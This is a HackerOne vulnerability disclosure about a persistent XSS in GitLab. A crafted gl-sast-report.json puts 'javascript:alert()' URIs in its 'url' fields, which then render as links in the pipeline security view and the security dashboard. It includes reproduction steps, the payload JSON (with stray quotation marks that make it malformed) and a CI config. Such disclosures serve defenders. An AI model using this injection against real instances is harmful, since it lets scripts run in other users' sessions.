Skip to content

Persistent XSS using gl-sast-report.json URL scheme

Link:          https://hackerone.com/reports/418072
By:            @ngalog

Details: PoC:

Screen_Shot_2018-10-03_at_9.30.44_PM

Steps to reproduce:

  • Create a new project, enable auto devops
  • Create following files, .gitlab-ci.yml and gl-sast-report.json

gl-sast-report.json

[
  {
    "tool": "brakeman",
    "category": "sast",
    "name": "Render path conta"ins parameter value",
    "message": "Render path contains "parameter value",
    "cve": "0239276870b43e64a4a111dc62da6fbe5334102484d6f2dde529e0d7ebca4109",
    "confidence": "Low",
    "location": {
      "file": "a://app/views/admin/groups/index.ht"ml.haml",
      "start_line": 18
    },
    "identifiers": [
      {
        "type": "brakeman_warning_code",
        "name": "Brakeman Warning Code 15",
        "value": "15",
        "url": "javascript:alert(1)//https://brakemanscanner.org/docs/warning"_types/dynamic_render_path/"
      }
    ],
    "file": "a://app/views/admin/groups/index.html.ha"ml",
    "line": 18,
    "url": "javascript:alert(2)//https://brakemanscanner.org/docs/warning_types/dynamic_render_path/"
  },
  {
    "tool": "brakeman",
    "category": "sast",
    "name": "Possible SQL injection",
    "message": "Possible SQL injection",
    "cve": "032dab1a6714c5a70ee47e21e47f87921a658abf0d97288a2ccdf14f425524f4",
    "confidence": "Medium",
    "location": {
      "file": "lib/gitlab/background_migration/populate_import_state.rb",
      "start_line": 21,
      "class": "Gitlab::BackgroundMigration::PopulateImportState",
      "method": "move_attributes_data_to_import_state"
    },
    "identifiers": [
      {
        "type": "brakeman_warning_code",
        "name": "Brakeman Warning Code 0",
        "value": "0",
        "url": "https://brakemanscanner.org/docs/warning_types/sql_injection/"
      }
    ],
    "file": "lib/gitlab/background_migration/populate_import_state.rb",
    "line": 21,
    "url": "https://brakemanscanner.org/docs/warning_types/sql_injection/"
  }
]

.gitlab-ci.yml

image: alpine

sast:
  script:
    - echo hi
  artifacts:
    paths:
    - gl-sast-report.json

Final file structure Screen_Shot_2018-10-03_at_9.33.21_PM

Finally, it also fires in security dashboard also.

Security Dashboard Screen_Shot_2018-10-03_at_9.33.50_PM Pipeline security Screen_Shot_2018-10-03_at_9.30.44_PM__1_

Impact

Persistent XSS

Edited by James Ritchey